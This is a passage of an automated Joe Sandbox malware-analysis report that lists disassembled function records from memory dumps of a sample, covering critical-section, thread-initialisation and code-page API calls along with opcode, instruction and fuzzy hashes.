                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 4132704954-2338778587
                                                              • Opcode ID: 439fb9c81a17ac7d691c5378ecbccf5710fab0366b31c832fa7975013d5444bb
                                                              • Instruction ID: 24bccbee7dcdc10e71239ff62fcc014c2c0c1f7004db23fa3c1c6285003cd019
                                                              • Opcode Fuzzy Hash: 439fb9c81a17ac7d691c5378ecbccf5710fab0366b31c832fa7975013d5444bb
                                                              • Instruction Fuzzy Hash: 9801D1B0E803489BC710DBA8AC82A6DF3B2AB49710F61567EF42557290DF35A9018F89
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 02178DD5
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 4132704954-2338778587
                                                              • Opcode ID: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                              • Instruction ID: 04f3821096c52ec68ecbff507a604a890d5c2f9c6c68e54f019277207e9aec6e
                                                              • Opcode Fuzzy Hash: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                              • Instruction Fuzzy Hash: 4B01D1B0A903489BCB00DF68AC82A6EF3B1AB89710F50166EF02597250DF75A8008F59
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00408B6E
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 2296764815-2338778587
                                                              • Opcode ID: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                              • Instruction ID: 17a8e3a08237a3d1dc64ba2a9f184f2dca1eb4f57e0bda546bf79f670ee7aec5
                                                              • Opcode Fuzzy Hash: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                              • Instruction Fuzzy Hash: 9F01D670F10348CBC710DFA89D82A6DF771AB19714F50567EF41577291DF79A8048B49
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 004085AE
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 2296764815-2338778587
                                                              • Opcode ID: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                              • Instruction ID: 7550eea810b6cd8f49eb53c2daec38c4b189c5a8056250b59824f6cde468e405
                                                              • Opcode Fuzzy Hash: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                              • Instruction Fuzzy Hash: 8F01D670E10344DBC710DFA89D42569F7B1A719310F20167EF525773D1DF39A9058B89
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 021782D0
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: @G@K$ZYA.
                                                              • API String ID: 4132704954-4236202813
                                                              • Opcode ID: 9134ac4aeb42c9b5666236611bf206903469005546699b8f577cb70b6e54836c
                                                              • Instruction ID: e301251d3ce623e766640b5599ffdd1a56dc18384460489634b4465c43dcf783
                                                              • Opcode Fuzzy Hash: 9134ac4aeb42c9b5666236611bf206903469005546699b8f577cb70b6e54836c
                                                              • Instruction Fuzzy Hash: 6B01ADB0A80308AFC750DF68E88595DB7B0EB98320F20517EE81597390DF386940CF59
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 021781C0
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: @G@K$A@K.
                                                              • API String ID: 4132704954-2457859030
                                                              • Opcode ID: eec83722eb2856bd13c5ccd16eeb5a217927af5c1102e52f61e64dd9668075e8
                                                              • Instruction ID: ddc5897f6cf7176c3945eab4e5655f82218a61355b0318d0d71247dec4337e0a
                                                              • Opcode Fuzzy Hash: eec83722eb2856bd13c5ccd16eeb5a217927af5c1102e52f61e64dd9668075e8
                                                              • Instruction Fuzzy Hash: 22018CB4E807089FC710DF68E981A5CF7B1AB88310F51617EE91597380DF34AD008F99
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00408069
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: @G@K$ZYA.
                                                              • API String ID: 2296764815-4236202813
                                                              • Opcode ID: 947c1552c58e194b7a3d6d09b3e8e23b227eb584c540669558338eb5038ea2ef
                                                              • Instruction ID: eb81366a0546a1846772a52cdd9905172eab691cb68f5f869d784b912a5327a9
                                                              • Opcode Fuzzy Hash: 947c1552c58e194b7a3d6d09b3e8e23b227eb584c540669558338eb5038ea2ef
                                                              • Instruction Fuzzy Hash: CC01AD74E003049FC750DFA8E982958B7B0AB88314F20517EF809673D1CE3C6948CB4D
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00407F59
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: @G@K$A@K.
                                                              • API String ID: 2296764815-2457859030
                                                              • Opcode ID: 12fe1a893f377b097c77001a84ae484a33a6e34f4be5b5691fdf45b548d45959
                                                              • Instruction ID: 91eda301f18b728dd67868f27b5654014bad386d0337af4a7680e78ba29a92ce
                                                              • Opcode Fuzzy Hash: 12fe1a893f377b097c77001a84ae484a33a6e34f4be5b5691fdf45b548d45959
                                                              • Instruction Fuzzy Hash: DE016D74E007089BC710DFA8E982658B7B1AB48704F10617FF90567391DE39AD048B9D
                                                              APIs
                                                              • GetOEMCP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,74DEDF80,00000000), ref: 0041EAA4
                                                              • GetACP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,74DEDF80,00000000), ref: 0041EABB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A
                                                              • API String ID: 0-2078354741
                                                              • Opcode ID: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                              • Instruction ID: 11c898d43c4d10c0ecc91de2811935f638b4c1e560e8759715af35a6ff81dd82
                                                              • Opcode Fuzzy Hash: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                              • Instruction Fuzzy Hash: F2F062745002058BEB10DB65D8497ADF770BF40379F640359F529872E2CBB599C5CB4D